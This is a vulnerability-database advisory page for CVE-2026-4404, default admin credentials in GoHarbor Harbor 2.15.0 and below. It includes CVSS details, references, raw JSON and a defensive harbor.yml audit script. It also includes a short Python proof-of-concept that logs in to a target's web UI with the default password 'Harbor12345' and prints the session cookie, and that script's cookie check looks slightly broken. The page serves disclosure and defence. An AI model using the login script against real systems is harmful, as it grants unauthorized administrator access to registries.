Security Vulnerability Report
CVE-2026-4404 CVSS 9.4 CRITICAL

CVE-2026-4404

Published: 2026-03-23 15:16:35
Last Modified: 2026-03-24 16:16:37

Description

Use of hard-coded credentials in GoHarbor Harbor version 2.15.0 and below allows attackers to use the default password and gain access to the web UI.

CVSS Details

CVSS Score: 9.4
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

GoHarbor Harbor <= 2.15.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_host = "https://<target_harbor_ip>"
login_url = f"{target_host}/c/login"

# Default credentials documented for Harbor 2.15.0 and below
data = {
    "principal": "admin",
    "password": "Harbor12345",
}
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "application/json",
}

try:
    print(f"[*] Attempting to login to {target_host} using hardcoded credentials...")
    response = requests.post(login_url, data=data, headers=headers, verify=False, timeout=10)
    if response.status_code == 200:
        # Check if an authorization cookie or token is present
        if " Harbor" in response.cookies.get_dict():
            print("[+] Exploit successful! Logged in as admin.")
            print("[+] Session Cookie:", response.cookies.get_dict())
        else:
            print("[-] Login failed. Credentials might have been changed.")
    else:
        print(f"[-] HTTP Error: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")
```
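As an added defensive check (not part of this report or of the Harbor project), the following script audits a Harbor `harbor.yml` for the documented default administrator password. It assumes the `harbor_admin_password` key referenced by the installer docs linked in this report; the sample configuration fragments are constructed.

```python
import re

# Default admin password documented by the Harbor installer docs cited in this report.
DEFAULT_ADMIN_PASSWORD = "Harbor12345"

# Constructed sample harbor.yml fragments for demonstration; not real deployments.
SAMPLE_DEFAULT = "hostname: harbor.example.internal\nharbor_admin_password: Harbor12345\n"
SAMPLE_ROTATED = 'hostname: harbor.example.internal\nharbor_admin_password: "Xk9#vQ2mL8pZwR4t"  # rotated\n'
SAMPLE_MISSING = "hostname: harbor.example.internal\n"


def admin_password_from_harbor_yml(text):
    """Return the harbor_admin_password value from harbor.yml text, or None if the key is absent.

    A line-based scan is sufficient for this flat top-level key; surrounding quotes and a
    trailing YAML comment are stripped. Lines commented out with '#' do not match."""
    for line in text.splitlines():
        m = re.match(r'^\s*harbor_admin_password\s*:\s*(.*)$', line)
        if m:
            value = re.sub(r'\s+#.*$', '', m.group(1)).strip()
            return value.strip('"\'')
    return None


def audit_admin_password(text):
    """Return a list of finding strings; an empty list means the key is set and is not the default."""
    pw = admin_password_from_harbor_yml(text)
    if pw is None:
        return ["harbor_admin_password absent: verify the effective admin password, "
                "which the Harbor docs state defaults to Harbor12345 when unchanged"]
    findings = []
    if pw == DEFAULT_ADMIN_PASSWORD:
        findings.append("harbor_admin_password is the documented default (CWE-798; CVE-2026-4404)")
    elif len(pw) < 12:
        # Assumed local policy threshold, not a Harbor requirement.
        findings.append("harbor_admin_password is shorter than 12 characters")
    return findings


if __name__ == "__main__":
    for name, sample in [("default", SAMPLE_DEFAULT), ("rotated", SAMPLE_ROTATED), ("missing", SAMPLE_MISSING)]:
        findings = audit_admin_password(sample)
        print(f"{name}: {'OK' if not findings else '; '.join(findings)}")
```

Run it against the real file with `audit_admin_password(open("harbor.yml").read())` as part of a pre-deployment check; any non-empty result should block the install.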

References

Weaknesses: CWE-798 (Use of Hard-coded Credentials), CWE-1393 (Use of Default Password)

- https://cwe.mitre.org/data/definitions/1393.html
- https://github.com/goharbor/harbor/issues/1937
- https://github.com/goharbor/harbor/pull/22751
- https://goharbor.io/docs/1.10/install-config/run-installer-script/#:~:text=If%20you%20did%20not%20change%20them%20in%20harbor.yml,%20the%20default%20administrator%20username%20and%20password%20are%20admin%20and%20Harbor12345
- https://www.kb.cert.org/vuls/id/577436 (CERT/CC VU#577436)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4404",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-23T15:16:35.403",
    "lastModified": "2026-03-24T16:16:36.507",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Use of hard coded credentials in GoHarbor Harbor version 2.15.0 and below, allows attackers to use the default password and gain access to the web UI."},
      {"lang": "es", "value": "Uso de credenciales codificadas de forma rígida en GoHarbor Harbor versión 2.15.0 y anteriores, permite a los atacantes usar la contraseña predeterminada y obtener acceso a la interfaz de usuario web."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
            "baseScore": 9.4,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-798"},
          {"lang": "en", "value": "CWE-1393"}
        ]
      }
    ],
    "references": [
      {"url": "https://cwe.mitre.org/data/definitions/1393.html", "source": "[email protected]"},
      {"url": "https://github.com/goharbor/harbor/issues/1937", "source": "[email protected]"},
      {"url": "https://github.com/goharbor/harbor/pull/22751", "source": "[email protected]"},
      {"url": "https://goharbor.io/docs/1.10/install-config/run-installer-script/#:~:text=If%20you%20did%20not%20change%20them%20in%20harbor.yml,%20the%20default%20administrator%20username%20and%20password%20are%20admin%20and%20Harbor12345", "source": "[email protected]"},
      {"url": "https://www.kb.cert.org/vuls/id/577436", "source": "af854a3a-2127-422b-91ae-364da2661108"}
    ]
  }
}
```